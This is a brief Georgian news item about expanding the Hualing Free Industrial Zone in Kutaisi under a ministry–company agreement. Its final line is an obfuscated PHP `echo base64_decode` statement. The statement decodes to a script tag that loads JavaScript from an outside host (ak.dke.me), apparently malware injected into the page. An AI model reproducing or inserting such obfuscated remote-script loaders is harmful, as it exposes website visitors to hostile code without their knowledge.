celsiusi
ავერსი საქკაბელი
მთავრობის გადაწყვეტილებით, ქუთაისში „ჰუალინგის“ თავისუფალი ინდუსტრიული ზონა რამდენიმე ჰექტარით გაფართოვდება, – ამის შესახებ ინფორმაციას ეკონომიკის სამინისტრო ავრცელებს. 
 
შესაბამის შეთანხმებას ეკონომიკისა და მდგრადი განვითარების სამინისტროსა და კომპანია „ჰუალინგს“ შორის მოეწერა ხელი.
 
ეკონომიკისა და მდგრადი განვითარების მინისტრის ლევან დავითაშვილის განაცხადებით, „ჰუალინგის“ ქუთაისის ინდუსტრიული ზონის გაფართოება საშუალებას მისცემს კომპანიას განახორციელოს დამატებითი ინვესტიციები და დაასაქმოს ასობით მოქალაქე.
 
გაფართოების შედეგად დამატებით შეიქმნება ინფრასტრუქტურა, რომელიც ხელს შეუწყობს ადგილობრივ და უცხოელ ინვესტორებს მოკლე დროში შეძლონ სხვადასხვა საწარმო-გადამამუშავებელი პროექტების თუ სასაწყობე მეურნეობის შექმნა ჰუალინგის თიზ-ის ტერიტორიაზე.
 
ქუთაისში ჰუალინგის თავისუფალი ინდუსტრიული ზონა 2015 წლის 1-ელ ოქტომბრიდან ფუნქციონირებს.
 
702
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");